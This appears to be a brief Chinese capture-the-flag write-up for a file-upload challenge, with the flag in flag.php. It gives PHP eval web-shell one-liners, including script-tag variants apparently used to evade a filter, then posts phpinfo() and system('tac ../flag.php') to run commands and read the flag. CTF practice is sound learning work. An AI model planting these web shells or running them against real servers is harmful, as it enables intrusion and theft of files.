题目内容:
想怎么传就怎么传,就是这么任性。
tips:flag在flag.php中
<?php @eval($_POST['Pai']);?>
<script language="pphphp">@eval($_POST['Pai']);</script>
<script language="PHP">@eval($_POST['Pai']);</script>
此时页面和源码都看不到代码了,直接 post
Pai=phpinfo();
正常命令执行获取 flag
system('tac ../flag.php');